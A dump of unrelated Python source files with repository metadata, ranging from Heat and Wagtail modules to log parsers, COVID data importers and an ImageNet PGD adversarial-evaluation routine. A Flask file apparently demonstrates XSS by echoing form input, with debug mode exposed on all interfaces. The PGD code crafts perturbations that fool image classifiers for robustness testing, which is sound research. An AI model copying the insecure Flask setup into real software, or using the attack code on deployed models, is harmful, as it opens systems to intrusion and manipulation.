    """Populate *env* with built-in resources, then apply the global
    environment definitions (which load after, and can override, built-ins)."""
    _load_global_resources(env)
    environment.read_global_environment(env)
def _load_global_resources(env):
    """Register constraints, stack lifecycle plugins and resource plugins
    discovered via entry points and the plugin manager into *env*."""
    _register_constraints(env, _get_mapping('heat.constraints'))
    _register_stack_lifecycle_plugins(
        env,
        _get_mapping('heat.stack_lifecycle_plugins'))
    manager = plugin_manager.PluginManager(__name__)
    # Sometimes resources should not be available for registration in Heat due
    # to unsatisfied dependencies. We look first for the function
    # 'available_resource_mapping', which should return the filtered resources.
    # If it is not found, we look for the legacy 'resource_mapping'.
    resource_mapping = plugin_manager.PluginMapping(['available_resource',
                                                     'resource'])
    constraint_mapping = plugin_manager.PluginMapping('constraint')
    _register_resources(env, resource_mapping.load_all(manager))
    _register_constraints(env, constraint_mapping.load_all(manager))
def list_opts():
    """Yield (group, options) pairs for oslo.config option discovery."""
    # Imported here rather than at module level to avoid a circular import.
    from heat.engine.resources.aws.lb import loadbalancer
    yield None, loadbalancer.loadbalancer_opts
| 31.827957 | 79 | 0.731757 | 0 | 0 | 121 | 0.040878 | 0 | 0 | 0 | 0 | 926 | 0.312838 |
d509b5f72e083aa61cb8b128a7291eccbddaaf89 | 858 | py | Python | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 5 | 2020-04-20T09:56:59.000Z | 2022-01-10T15:51:02.000Z | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 1 | 2020-08-26T01:04:55.000Z | 2020-08-26T02:00:14.000Z | research/02_TrafficSignClassification/02_CarNDTrafficSignClassifier/source/path/run.py | LewisCollum/frostAV | f17966b2646640ee1d29f80f951f9622fdbbb78a | [
"MIT"
] | 2 | 2020-01-21T18:58:53.000Z | 2020-05-20T04:24:40.000Z | import os
from datetime import datetime
directory = "../runs"
current = os.path.join(directory, ".current")
class Run:
    """Resolves the artifact file paths inside one named run directory."""
    def __init__(self, runName):
        base = os.path.join(directory, runName)
        # Attribute name -> artifact file name within the run directory.
        artifacts = {
            "model": "model.h5",
            "log": "log.csv",
            "accuracy": "accuracy.png",
            "modelDiagram": "model.png",
            "modelSummary": "modelSummary",
        }
        for attribute, filename in artifacts.items():
            setattr(self, attribute, os.path.join(base, filename))
def make():
    """Create a fresh timestamped run directory and record it as current."""
    runName = f"{datetime.now():%m-%d_%H%M}"
    os.mkdir(os.path.join(directory, runName))
    # Persist the run name so loadCurrent() can find it later.
    with open(current, 'w') as marker:
        marker.write(runName)
def loadFromName(runName):
    """Build a Run for the given run-directory name."""
    return Run(runName)
def loadCurrent():
    """Return the Run whose name is recorded in the .current marker file."""
    with open(current) as f:
        return loadFromName(f.readline())
def has(path):
    """Return True if *path* exists and is a regular file."""
    return os.path.isfile(path)
| 26.8125 | 61 | 0.635198 | 368 | 0.428904 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.128205 |
d50ac85d5573725c47a9716c89b128de25b4d933 | 415 | py | Python | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | flask_code/day02_request/12xss.py | haitaoss/flask_study | c8431f17c1156b7086d85c914edbfb5293ae50f1 | [
"Apache-2.0"
] | null | null | null | # coding:utf-8
from flask import Flask, render_template, request
# Create the Flask application
app = Flask(__name__)
# View function
@app.route('/xss', methods=['POST', 'GET'])
def xss():
    """Render xss.html, echoing back any text submitted via POST."""
    submitted = request.form.get('text') if request.method == 'POST' else ""
    return render_template('xss.html', text=submitted)
# Start the Flask application
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# manager.run()
| 17.291667 | 50 | 0.626506 | 0 | 0 | 0 | 0 | 191 | 0.43508 | 0 | 0 | 140 | 0.318907 |
d50c7c2f1fa783afbf677f62ca8de9f21c378df9 | 1,543 | py | Python | mk312/constants.py | bkifft/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 2 | 2022-03-12T14:09:46.000Z | 2022-03-16T21:44:34.000Z | mk312/constants.py | bkifft/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 1 | 2021-04-15T17:58:43.000Z | 2021-04-15T17:58:43.000Z | mk312/constants.py | Rubberfate/mk312com | a36fd20bc8518f81e2de23c9fff28296cb9cb6d6 | [
"MIT"
] | 2 | 2021-03-16T20:32:59.000Z | 2022-03-12T14:30:16.000Z | # -*- coding: utf-8 -*-
# Memory addresses
ADDRESS_R15 = 0x400f
ADDRESS_ADC_POWER = 0x4062
ADDRESS_ADC_BATTERY = 0x4063
ADDRESS_LEVELA = 0x4064
ADDRESS_LEVELB = 0x4065
ADDRESS_PUSH_BUTTON = 0x4068
ADDRESS_COMMAND_1 = 0x4070
ADDRESS_COMMAND_2 = 0x4071
ADDRESS_MA_MIN_VALUE = 0x4086
ADDRESS_MA_MAX_VALUE = 0x4087
ADDRESS_CURRENT_MODE = 0x407b
ADDRESS_LCD_WRITE_PARAMETER_1 = 0x4180
ADDRESS_LCD_WRITE_PARAMETER_2 = 0x4181
ADDRESS_POWER_LEVEL = 0x41f4
ADDRESS_BATTERY_LEVEL = 0x4203
ADDRESS_LEVELMA = 0x420D
ADDRESS_KEY = 0x4213
# EEPROM addresses
EEPROM_ADDRESS_POWER_LEVEL = 0x8009
EEPROM_ADDRESS_FAVORITE_MODE = 0x800C
# Commands
COMMAND_START_FAVORITE_MODULE = 0x00
COMMAND_EXIT_MENU = 0x04
COMMAND_SHOW_MAIN_MENU = 0x0a
COMMAND_NEW_MODE = 0x12
COMMAND_WRITE_STRING_TO_LCD = 0x15
COMMAND_NO_COMMAND = 0xff
# Modes
MODE_POWERON = 0x00
MODE_UNKNOWN = 0x01
MODE_WAVES = 0x76
MODE_STROKE = 0x77
MODE_CLIMB = 0x78
MODE_COMBO = 0x79
MODE_INTENSE = 0x7a
MODE_RYTHM = 0x7b
MODE_AUDIO1 = 0x7c
MODE_AUDIO2 = 0x7d
MODE_AUDIO3 = 0x7e
MODE_SPLIT = 0x7f
MODE_RANDOM1 = 0x80
MODE_RANDOM2 = 0x81
MODE_TOGGLE = 0x82
MODE_ORGASM = 0x83
MODE_TORMENT = 0x84
MODE_PHASE1 = 0x85
MODE_PHASE2 = 0x86
MODE_PHASE3 = 0x87
MODE_USER1 = 0x88
MODE_USER2 = 0x89
MODE_USER3 = 0x8a
MODE_USER4 = 0x8b
MODE_USER5 = 0x8c
MODE_USER6 = 0x8d
MODE_USER7 = 0x8e
# Power Level
POWERLEVEL_LOW = 0x01
POWERLEVEL_NORMAL = 0x02
POWERLEVEL_HIGH = 0x03
# Register 15 Bits
REGISTER_15_ADCDISABLE = 0
# Buttons
BUTTON_MENU = 0x80
BUTTON_OK = 0x20
BUTTON_RIGHT = 0x40
BUTTON_LEFT = 0x10
| 20.302632 | 38 | 0.813999 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 116 | 0.075178 |
d50e3b87908d0499a5a93735ec1c8322d076f909 | 3,359 | py | Python | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 5 | 2018-12-20T00:51:30.000Z | 2022-02-08T17:38:33.000Z | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 1 | 2022-02-16T08:49:51.000Z | 2022-02-17T02:19:01.000Z | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 8 | 2020-03-20T11:10:16.000Z | 2022-01-28T16:46:15.000Z | import os
import csv
from pyparsing import Word, alphas, Combine, nums, Regex, ParseException
from collections import OrderedDict
class BlueGeneLog(object):
    """pyparsing-based parser for BlueGene/L supercomputer log lines."""
    def __init__(self, dataset):
        # Name/handle of the dataset being parsed (kept for reference;
        # not used elsewhere in this class).
        self.dataset = dataset
        self.bluegenelog_grammar = self.__get_bluegenelog_grammar()
    @staticmethod
    def __get_bluegenelog_grammar():
        """The definition of BlueGene/L grammar.
        The BlueGene/L logs can be downloaded from [Usenix2006a]_ and
        this data was used in [Stearley2008]_.
        Returns
        -------
        bluegene_grammar :
            Grammar for BlueGene/L supercomputer logs.
        References
        ----------
        .. [Usenix2006a] The HPC4 data. URL: https://www.usenix.org/cfdr-data#hpc4
        .. [Stearley2008] Stearley, J., & Oliner, A. J. Bad words: Finding faults in Spirit's syslogs.
           In 8th IEEE International Symposium on Cluster Computing and the Grid, pp. 765-770.
        """
        # Field sub-grammars, in the order they appear on a log line.
        ints = Word(nums)
        sock = Word(alphas + '-' + '_')
        number = ints
        date = Combine(ints + '.' + ints + '.' + ints)
        core1 = Word(alphas + nums + '-' + ':' + '_')
        datetime = Combine(ints + '-' + ints + '-' + ints + '-' + ints + '.' + ints + '.' + ints + '.' + ints)
        core2 = Word(alphas + nums + '-' + ':' + '_')
        source = Word(alphas)
        service = Word(alphas)
        info_type = Word(alphas)
        # The free-text message is simply the remainder of the line.
        message = Regex('.*')
        # blue gene log grammar: all fields concatenated in line order
        bluegene_grammar = sock + number + date + core1 + datetime + core2 + source + service + info_type + message
        return bluegene_grammar
    def parse_log(self, log_line):
        """Parse the BlueGene/L logs based on defined grammar.
        Parameters
        ----------
        log_line : str
            A log line to be parsed
        Returns
        -------
        parsed : dict[str, str]
            A parsed BlueGene/L log. Empty when the line does not match the
            grammar (the offending line is printed); callers must tolerate
            missing keys in that case.
        """
        parsed = OrderedDict()
        try:
            parsed_bluegenelog = self.bluegenelog_grammar.parseString(log_line)
            # Map positional grammar results onto named fields.
            parsed['sock'] = parsed_bluegenelog[0]
            parsed['number'] = parsed_bluegenelog[1]
            parsed['timestamp'] = parsed_bluegenelog[2]
            parsed['core1'] = parsed_bluegenelog[3]
            parsed['timestamp_bgl'] = parsed_bluegenelog[4]
            parsed['core2'] = parsed_bluegenelog[5]
            parsed['source'] = parsed_bluegenelog[6]
            parsed['service'] = parsed_bluegenelog[7]
            parsed['level'] = parsed_bluegenelog[8]
            parsed['message'] = parsed_bluegenelog[9]
        except ParseException:
            # Malformed line: report it and fall through to the empty dict.
            print(log_line)
        return parsed
if __name__ == '__main__':
    # Parse each configured BlueGene/L dataset file and write the parsed
    # fields as rows of a ground-truth CSV file.
    dataset_path = '/home/hudan/Git/prlogparser/datasets/'
    filenames = ['bgl2/bgl2']
    test_file = '/home/hudan/Git/prlogparser/groundtruth/test-results/bgl-test.csv'
    bl = BlueGeneLog('')
    # Fixed: the original reused the name `f` for both the CSV output handle
    # and each input log file, so the output file was shadowed and never
    # closed. Distinct names + context managers guarantee both are closed.
    with open(test_file, 'w', newline='') as csv_file:
        writer = csv.writer(csv_file)
        for filename in filenames:
            full_path = os.path.join(dataset_path, filename)
            with open(full_path, 'r') as log_file:
                for line in log_file:
                    parsed_line = bl.parse_log(line)
                    print(parsed_line['timestamp'])
                    row = list(parsed_line.values())
                    writer.writerow(row)
d50eb66f6a2f65dfb75bacdcb2e90ded759fc355 | 2,106 | py | Python | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | 7 | 2016-09-28T10:51:44.000Z | 2018-09-29T08:27:23.000Z | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | null | null | null | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | 2 | 2017-05-21T08:41:19.000Z | 2018-08-06T13:50:59.000Z | from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from wagtailcomments import registry
from wagtailcomments.models import CommentStatus
from wagtailcomments.utils import get_comment_form_class, get_return_url
def add_comment(request, content_type_pk, object_pk):
    """Django view: create a comment on a registered commentable object.

    Looks up the target object via (content type pk, object pk), validates a
    posted comment form, saves it, and redirects back to the object's page
    with a status message. Non-POST requests are redirected rather than
    rejected; invalid forms re-render the add_comment template.
    """
    content_type = get_object_or_404(ContentType, pk=content_type_pk)
    # Only model classes registered for commenting may receive comments.
    if content_type.model_class() not in registry:
        raise Http404
    object = get_object_or_404(content_type.model_class(), pk=object_pk)
    return_url = get_return_url(request, object)
    # Only POSTs allowed, but be nice to people instead of a HTTP 405 error
    if request.method != 'POST':
        return HttpResponseRedirect(return_url)
    # For comment systems that allow replies, etc, there might be multiple
    # forms on the page. These forms are disambiguated using a form prefix,
    # 'comment_form_prefix' should be included in the post data so we know what
    # fields to look for.
    form_prefix = request.POST.get('comment_form_prefix')
    CommentForm = get_comment_form_class()
    form = CommentForm(data=request.POST, files=request.FILES, request=request,
                       object=object, prefix=form_prefix)
    if form.is_valid():
        comment = form.save()
        if comment.status is CommentStatus.published:
            message = 'Your comment has been posted'
        else:
            # Every other type gets the same 'awaiting moderation' message,
            # regardless of whether the comment is awaiting moderation or has
            # automatically been marked as deleted
            message = 'Your comment has been added, and is awaiting moderation'
        messages.success(request, message)
        return HttpResponseRedirect(return_url)
    # Invalid form: re-render with field errors.
    return TemplateResponse(request, 'wagtailcomments/add_comment.html', {
        'object': object,
        'object_type': content_type,
        'form': form,
    })
| 42.979592 | 79 | 0.727445 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 649 | 0.308167 |
d50f0e9cbb19e05d48c36acf153af68b7038da01 | 2,468 | py | Python | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 9 | 2018-08-19T21:47:00.000Z | 2021-11-30T20:46:09.000Z | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2021-05-16T00:12:39.000Z | 2021-05-16T18:36:47.000Z | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2020-11-28T06:13:10.000Z | 2021-05-16T22:23:22.000Z | from typing import List, Optional
from open_mafia_engine.core.all import (
Ability,
Action,
Actor,
ATBase,
CancelAction,
EPreAction,
Game,
GameObject,
handler,
)
from .auxiliary import TempPhaseAux
class RoleBlockerAux(TempPhaseAux):
"""Aux object that blocks actions made by the target.
It removes itself after the end of the phase.
Attributes
----------
game : Game
target : Actor
The target to block.
key : None or str
Safely ignore this (?).
only_abilities : bool
If True, only blocks Ability activations, and lets Triggers through.
Default is True.
"""
def __init__(
self,
game: Game,
/,
target: Actor,
key: str = None,
*,
only_abilities: bool = True,
use_default_constraints: bool = True,
):
self._only_abilities = bool(only_abilities)
self._target = target
super().__init__(
game, key=None, use_default_constraints=use_default_constraints
)
@property
def target(self) -> Actor:
return self._target
@property
def only_abilities(self) -> bool:
return self._only_abilities
@handler
def handle_to_cancel(self, event: EPreAction) -> Optional[List[CancelAction]]:
"""Cancels the action if it came from the target."""
if isinstance(event, EPreAction):
src = event.action.source
if isinstance(src, ATBase):
if self.only_abilities and not isinstance(src, Ability):
# Skip
return
if src.owner == self.target:
return [CancelAction(self.game, self, target=event.action)]
class RoleBlockAction(Action):
    """Action that prevents the target from actioning until the end of the phase."""
    def __init__(
        self,
        game: Game,
        source: GameObject,
        /,
        target: Actor,
        *,
        priority: float = 90,
        canceled: bool = False,
    ):
        # target: the Actor to roleblock.
        # NOTE(review): priority defaults to 90, presumably so the block is
        # applied before the blocked actions resolve -- confirm engine ordering.
        self.target = target
        super().__init__(game, source, priority=priority, canceled=canceled)
    def doit(self):
        # Constructing the aux object is the whole effect: it attaches
        # itself to the game and cancels the target's actions this phase.
        RoleBlockerAux(self.game, target=self.target, only_abilities=True)
# Factory-generated Ability subclass that exposes RoleBlockAction as a
# player-activated ability taking a single `target` parameter.
RoleBlockAbility = Ability.generate(
    RoleBlockAction,
    params=["target"],
    name="RoleBlockAbility",
    doc="Ability to block others.",
    desc="Roleblocks the target.",
)
| 24.929293 | 84 | 0.598865 | 2,041 | 0.826985 | 0 | 0 | 675 | 0.273501 | 0 | 0 | 603 | 0.244327 |
d5136a0af274a53470c429bc113f5296b87d7800 | 6,836 | py | Python | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | null | null | null | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | 5 | 2021-03-30T14:37:56.000Z | 2021-10-11T17:33:20.000Z | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | null | null | null | import os
import io
import math
import requests
from datetime import datetime, date, timedelta
import pandas as pd
from covid_data.models import State, County, Outbreak, OutbreakCumulative
from covid_data.utilities import get_datetime_from_str, api_request_from_str
# Some functions only work for specific region types (state, county etc) because the data sources used differ
"""
# Gets all state outbreak data and returns it as json object
def get_outbreak_data_by_state(outbreak_state):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code
print(outbreak_str)
return api_request_from_str(outbreak_str)
# Gets all outbreak data for a specific state on a specified date and returns it as a json object
def get_outbreak_data_by_state_and_date(outbreak_state, outbreak_date):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code + "&date=" + str(outbreak_date).replace("-","")
return api_request_from_str(outbreak_str)
"""
def _nan_to_none(value):
    """Map pandas NaN (a missing CSV cell) to None; return other values unchanged."""
    return None if math.isnan(value) else value


def update_state_outbreak():
    """Fetch the COVID Tracking Project daily-states CSV and upsert records.

    For every state we track, creates/updates a daily `Outbreak` record and
    a cumulative `OutbreakCumulative` record.  Rows for states not in our
    State table are skipped, as are rows with fewer than 100 cumulative
    positive cases.  Optional columns that can be missing (NaN) are stored
    as None.
    """
    state_outbreak_csv_url = "https://raw.githubusercontent.com/COVID19Tracking/covid-tracking-data/master/data/states_daily_4pm_et.csv"
    state_outbreak_csv = requests.get(state_outbreak_csv_url).content
    outbreak_data = pd.read_csv(io.StringIO(state_outbreak_csv.decode('utf-8')))
    for index, row in outbreak_data.iterrows():
        # Skip states that are not regions we track.
        try:
            record_state = State.objects.get(code=row['state'])
        except State.DoesNotExist:
            continue
        record_date = get_datetime_from_str(str(row['date']))
        # Only start recording once a state passes 99 cumulative cases.
        if row['positive'] > 99:
            new_values = {
                'cases': row['positiveIncrease'],
                'negative_tests': _nan_to_none(row['negativeIncrease']),
                'total_tested': row['totalTestResultsIncrease'],
                'deaths': row['deathIncrease'],
                'admitted_to_hospital': _nan_to_none(row['hospitalizedIncrease']),
                'hospitalized': _nan_to_none(row['hospitalizedCurrently']),
                'in_icu': _nan_to_none(row['inIcuCurrently']),
            }
            state_outbreak, created = Outbreak.objects.update_or_create(
                region=record_state, date=record_date, defaults=new_values
            )
            # NOTE: update_or_create already persists; kept for signal parity
            # with the original implementation.
            state_outbreak.save()
            state_outbreak_cumulative, created = OutbreakCumulative.objects.update_or_create(
                region=record_state,
                date=record_date,
                defaults={
                    'cases': row['positive'],
                    'negative_tests': _nan_to_none(row['negative']),
                    'total_tested': row['totalTestResults'],
                    'deaths': _nan_to_none(row['death']),
                    'hospitalized': _nan_to_none(row['hospitalizedCumulative']),
                    'in_icu': _nan_to_none(row['inIcuCumulative']),
                }
            )
            state_outbreak_cumulative.save()
def update_all_state_outbreaks(date_to_update):
    # NOTE(review): this function appears stale/broken:
    # `get_outbreak_data_by_state_and_date` exists only inside the
    # commented-out block above, and `update_state_outbreak()` no longer
    # takes an argument -- calling this will raise. Confirm before use.
    states = State.objects.all()
    for state in states:
        outbreak_json = get_outbreak_data_by_state_and_date(state, date_to_update)
        update_state_outbreak(outbreak_json)
def update_county_outbreak():
    """Fetch the NYT county-level COVID CSV and upsert per-county records.

    Creates/updates `OutbreakCumulative` for every county row with more
    than 24 cumulative cases, and a daily `Outbreak` record whenever the
    previous day's row exists in the same CSV.  Counties missing from our
    County table are skipped.
    """
    url = "https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv"
    county_data = requests.get(url).content
    # fips must stay a string ('object' dtype) to preserve leading zeros.
    county_data_dataframe = pd.read_csv(io.StringIO(county_data.decode('utf-8')), dtype={'fips': 'object'})
    for index, row in county_data_dataframe.iterrows():
        cases = row['cases']
        if cases > 24:
            record_date = datetime.strptime(row['date'], '%Y-%m-%d').date()
            county_fips = str(row['fips'])
            deaths = row['deaths']
            # Skip counties we do not track (bug fix: was a bare `except`
            # that silently swallowed every error).
            try:
                county = County.objects.get(fips_code=county_fips)
            except County.DoesNotExist:
                continue
            outbreak_cumulative_record, _ = OutbreakCumulative.objects.update_or_create(
                region=county,
                date=record_date,
                defaults={
                    'cases': cases,
                    'deaths': deaths
                }
            )
            outbreak_cumulative_record.save()
            # Daily deltas require the previous day's row in the same CSV.
            day_before = record_date - timedelta(days=1)
            day_before_df = county_data_dataframe[(county_data_dataframe.fips == county_fips) & (county_data_dataframe.date == str(day_before))]
            try:
                prev_index = day_before_df.index[0]
            except IndexError:
                # No data for the previous day: cannot compute a delta.
                continue
            daily_cases = cases - day_before_df['cases'][prev_index]
            if daily_cases < 0:
                daily_cases = 0
            daily_deaths = deaths - day_before_df['deaths'][prev_index]
            Outbreak.objects.update_or_create(
                region=county,
                date=record_date,
                defaults={
                    'cases': daily_cases,
                    'deaths': daily_deaths
                }
            )
| 42.459627 | 304 | 0.599912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,720 | 0.251609 |
d51442e5802a7e7a7d3c8bda504b303ddbb541d1 | 483 | py | Python | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | import bs4
with open("example.html") as f:
    # Create a BeautifulSoup object from the text file.
    soup = bs4.BeautifulSoup(f.read(), "lxml")
    print(type(soup)) # <class 'bs4.BeautifulSoup'>
    # Query the list of tags whose id is "author".
    elems = soup.select("#author")
    print(type(elems)) # <class 'list'>
    print(type(elems[0])) # <class 'bs4.element.Tag'>
    # Print the element as a string, including the tag markup.
    print(str(elems[0]))
    # Print only the text inside the tag.
    print(elems[0].getText())
    # Print the tag's attribute mapping.
    print(elems[0].attrs)
    # Look up this tag's id attribute value.
    print(elems[0].get('id'))
| 19.32 | 50 | 0.654244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 334 | 0.557596 |
d5149d3b5b3f45cac244c29fa5eaa4c2f9bbaeff | 109 | py | Python | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 13 11:34:33 2019
@author: manninan
""" | 15.571429 | 35 | 0.614679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 107 | 0.981651 |
d5155bb3abd235bf78598d767115ae4c2571c009 | 55 | py | Python | pytorchltr/__init__.py | rjagerman/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 37 | 2020-05-24T13:40:52.000Z | 2022-03-17T09:00:52.000Z | pytorchltr/__init__.py | SuperXiang/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 22 | 2020-05-25T11:35:38.000Z | 2021-03-20T04:08:07.000Z | pytorchltr/__init__.py | SuperXiang/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 4 | 2020-10-16T13:14:16.000Z | 2022-01-31T17:18:20.000Z | r"""
.. include::../README.md
:start-line: 1
"""
| 7.857143 | 24 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.981818 |
d51574f35003d93d91b7a70eebae9e1bc40963ce | 8,548 | py | Python | ImageNet/lib/validation.py | mhilmiasyrofi/AT_HE | c63c36a0661d826e58eb355914c6758f85981ff3 | [
"Apache-2.0"
] | 107 | 2020-06-15T09:55:11.000Z | 2020-12-20T11:27:11.000Z | pytorch_ares/third_party/AT_HE/ImageNet/lib/validation.py | haichen-ber/ares | 474d549aa402b4cdd5e3629d23d035c31b60a360 | [
"MIT"
] | 7 | 2020-06-14T03:00:18.000Z | 2020-12-07T07:10:10.000Z | pytorch_ares/third_party/AT_HE/ImageNet/lib/validation.py | haichen-ber/ares | 474d549aa402b4cdd5e3629d23d035c31b60a360 | [
"MIT"
] | 19 | 2020-06-14T08:35:33.000Z | 2020-12-19T13:43:41.000Z | from utils import *
import torch
import sys
import numpy as np
import time
import torchvision
from torch.autograd import Variable
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def validate_pgd(val_loader, model, criterion, K, step, configs, logger, save_image=False, HE=False):
    """Evaluate `model` under a K-step PGD attack and return top-1 accuracy.

    Inputs are perturbed within an L-inf ball of radius configs.ADV.clip_eps
    using `step`-sized ascent steps.  If `save_image` is True, original and
    adversarial images plus scaled perturbations for the first two batches
    are written under ./saved_images/.  `HE` / `configs.pretrained` only
    select the output sub-directory suffix.
    """
    # Mean/Std for normalization (applied AFTER the attack, which operates
    # in raw [0, 1] pixel space).
    mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
    mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
    std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
    # Initiate the meters
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top5 = AverageMeter()
    eps = configs.ADV.clip_eps
    model.eval()
    end = time.time()
    logger.info(pad_str(' PGD eps: {}, K: {}, step: {} '.format(eps, K, step)))
    # Suffix that selects which saved_images/* sub-folders receive outputs.
    if HE == True:
        is_HE = '_HE'
    else:
        is_HE = ''
    if configs.pretrained:
        is_HE = '_pretrained'
    for i, (input, target) in enumerate(val_loader):
        input = input.cuda(non_blocking=True)
        target = target.cuda(non_blocking=True)
        # Save original images (first two batches only).
        if save_image == True and i < 2:
            original_images_save = input.clone()
            for o in range(input.size(0)):
                torchvision.utils.save_image(original_images_save[o, :, :, :], 'saved_images/original_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
        # Random start: uniform noise in [-eps, eps], clamped to valid pixels.
        randn = torch.FloatTensor(input.size()).uniform_(-eps, eps).cuda()
        input += randn
        input.clamp_(0, 1.0)
        orig_input = input.clone()
        # K steps of projected gradient ascent on the loss.
        for _ in range(K):
            invar = Variable(input, requires_grad=True)
            in1 = invar - mean
            in1.div_(std)
            output = model(in1)
            ascend_loss = criterion(output, target)
            ascend_grad = torch.autograd.grad(ascend_loss, invar)[0]
            pert = fgsm(ascend_grad, step)
            # Apply perturbation, then project back into the eps-ball
            # around the (noisy) starting point and the valid pixel range.
            input += pert.data
            input = torch.max(orig_input-eps, input)
            input = torch.min(orig_input+eps, input)
            input.clamp_(0, 1.0)
        # Save adversarial images (first two batches only).
        if save_image == True and i < 2:
            adv_images_save = input.clone()
            for o in range(input.size(0)):
                torchvision.utils.save_image(adv_images_save[o, :, :, :], 'saved_images/adv_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
        # Save the perturbation rescaled from [-eps, eps] to [0, 1] for viewing.
        perturbation = input - orig_input
        perturbation.clamp_(-eps,eps)
        scaled_perturbation = (perturbation.clone() + eps) / (2 * eps)
        scaled_perturbation.clamp_(0, 1.0)
        if save_image == True and i < 2:
            for o in range(input.size(0)):
                torchvision.utils.save_image(scaled_perturbation[o, :, :, :], 'saved_images/scaled_perturbation'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
        input.sub_(mean).div_(std)
        with torch.no_grad():
            # compute output
            output = model(input)
            loss = criterion(output, target)
            # measure accuracy and record loss
            prec1, prec5 = accuracy(output, target, topk=(1, 5))
            losses.update(loss.item(), input.size(0))
            top1.update(prec1[0], input.size(0))
            top5.update(prec5[0], input.size(0))
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            if i % configs.TRAIN.print_freq == 0:
                print('PGD Test: [{0}/{1}]\t'
                      'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                      'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                      'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
